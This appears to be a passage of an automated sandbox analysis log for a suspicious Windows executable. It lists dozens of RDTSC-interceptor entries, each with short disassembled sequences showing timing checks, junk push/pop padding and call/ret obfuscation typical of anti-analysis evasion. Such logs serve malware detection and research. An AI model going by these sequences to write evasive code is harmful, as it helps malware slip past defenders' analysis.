Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 734F15 second address: 734F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FED75508866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 734F1F second address: 734F29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 734F29 second address: 734F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FED75508878h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pushad 0x00000010 jmp 00007FED75508877h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6B68CD second address: 6B68D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FED74F3E516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 733DBC second address: 733DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 733DC0 second address: 733DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 733DC6 second address: 733DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007FED75508866h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F966B second address: 6F9670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F97B9 second address: 6F97C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FED75508866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F97C9 second address: 6F97E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007FED74F3E520h 0x0000000e jmp 00007FED74F3E51Ah 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F9896 second address: 6F989A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F9B9F second address: 6F9BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F9BA3 second address: 54BAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FED7550886Dh 0x0000000d push dword ptr [ebp+122D0C21h] 0x00000013 jc 00007FED75508866h 0x00000019 mov edx, ecx 0x0000001b call dword ptr [ebp+122D244Ah] 0x00000021 pushad 0x00000022 sub dword ptr [ebp+122D1C6Ch], edi 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D1C6Ch], ecx 0x00000030 sub dword ptr [ebp+122D1C6Ch], esi 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a stc 0x0000003b mov dword ptr [ebp+122D36A8h], eax 0x00000041 jmp 00007FED75508871h 0x00000046 mov esi, 0000003Ch 0x0000004b stc 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 mov dword ptr [ebp+122D1C56h], ecx 0x00000056 lodsw 0x00000058 ja 00007FED75508872h 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 xor dword ptr [ebp+122D1990h], edi 0x00000069 or ebx, 4FB5547Ch 0x0000006f popad 0x00000070 mov ebx, dword ptr [esp+24h] 0x00000074 clc 0x00000075 push eax 0x00000076 js 00007FED75508874h 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F9D31 second address: 6F9D8D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FED74F3E51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 412A02DAh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FED74F3E518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b add ecx, 64617E86h 0x00000031 call 00007FED74F3E519h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FED74F3E528h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F9D8D second address: 6F9DCB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FED75508866h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FED7550886Ah 0x00000013 jmp 00007FED75508878h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007FED75508866h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F9DCB second address: 6F9DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6F9DCF second address: 6F9E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508879h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f jmp 00007FED75508878h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FED75508871h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA08C second address: 6FA091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA091 second address: 6FA096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA7FD second address: 6FA801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA801 second address: 6FA807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA807 second address: 6FA80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA80B second address: 6FA80F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FA80F second address: 6FA824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FED74F3E51Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FAA71 second address: 6FAA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6FAA77 second address: 6FAB18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 adc cl, 00000076h 0x0000000c lea eax, dword ptr [ebp+12481459h] 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FED74F3E518h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D3838h] 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007FED74F3E522h 0x00000039 jmp 00007FED74F3E529h 0x0000003e popad 0x0000003f push eax 0x00000040 push ebx 0x00000041 jmp 00007FED74F3E524h 0x00000046 pop ebx 0x00000047 nop 0x00000048 mov dword ptr [ebp+122D17D4h], ecx 0x0000004e lea eax, dword ptr [ebp+12481415h] 0x00000054 or dword ptr [ebp+1247462Ah], edi 0x0000005a mov dword ptr [ebp+122D2963h], esi 0x00000060 push eax 0x00000061 jc 00007FED74F3E51Eh 0x00000067 push ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7340AE second address: 7340CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FED7550886Ah 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7340CB second address: 7340D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7340D3 second address: 7340DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73439E second address: 7343BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FED74F3E527h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7346C4 second address: 7346D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 737D5E second address: 737D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 737D64 second address: 737D6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 737D6A second address: 737D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 737D78 second address: 737D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007FED7550886Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 737D8F second address: 737DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 737DA1 second address: 737DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73E97E second address: 73E982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D4BC second address: 73D4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D4C1 second address: 73D4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007FED74F3E51Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D779 second address: 73D77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D77D second address: 73D783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D783 second address: 73D789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D789 second address: 73D7A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FED74F3E516h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007FED74F3E516h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D7A2 second address: 73D7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FED75508866h 0x0000000a jbe 00007FED75508866h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D7B3 second address: 73D7B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D906 second address: 73D929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FED7550886Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73D929 second address: 73D947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push ecx 0x00000007 jmp 00007FED74F3E525h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73DAB4 second address: 73DAC3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED75508866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73DC4B second address: 73DC75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FED74F3E516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e jmp 00007FED74F3E528h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73DC75 second address: 73DC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73DC79 second address: 73DC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73DC7D second address: 73DC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73DDE9 second address: 73DE01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 73E328 second address: 73E32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 741DD2 second address: 741DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 741DE2 second address: 741DF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508870h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 741DF8 second address: 741E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FED74F3E51Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 744A87 second address: 744A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 744BFE second address: 744C08 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 744C08 second address: 744C0F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 744C0F second address: 744C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FED74F3E521h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 744EFE second address: 744F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FED75508866h 0x0000000a jmp 00007FED7550886Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 749ED4 second address: 749F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007FED74F3E516h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 ja 00007FED74F3E516h 0x0000001d jc 00007FED74F3E516h 0x00000023 popad 0x00000024 jmp 00007FED74F3E522h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6B163B second address: 6B1662 instructions: 0x00000000 rdtsc 0x00000002 js 00007FED7550887Dh 0x00000008 jo 00007FED75508866h 0x0000000e jmp 00007FED75508871h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6B1662 second address: 6B167E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E528h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6B167E second address: 6B1684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6B1684 second address: 6B16B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FED74F3E516h 0x0000000d jmp 00007FED74F3E51Dh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FED74F3E526h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 6B16B7 second address: 6B16BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 74918F second address: 7491A4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FED74F3E516h 0x00000008 jmp 00007FED74F3E51Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7491A4 second address: 7491C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FED75508870h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 749491 second address: 749499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 749499 second address: 74949E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 74978D second address: 7497A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jnp 00007FED74F3E51Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 74DFD9 second address: 74DFE5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FED75508866h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 74D88E second address: 74D8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FED74F3E51Fh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FED74F3E51Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 74D8BC second address: 74D8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 74DD1E second address: 74DD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 74DD22 second address: 74DD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 74DD31 second address: 74DD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 74DD3B second address: 74DD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7527AA second address: 7527AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 7527AE second address: 7527DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007FED75508866h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 jc 00007FED75508866h 0x0000001b pop edi 0x0000001c pushad 0x0000001d jmp 00007FED7550886Ah 0x00000022 je 00007FED75508866h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 75298D second address: 752994 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe RDTSC instruction interceptor: First address: 752994 second address: 75299C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
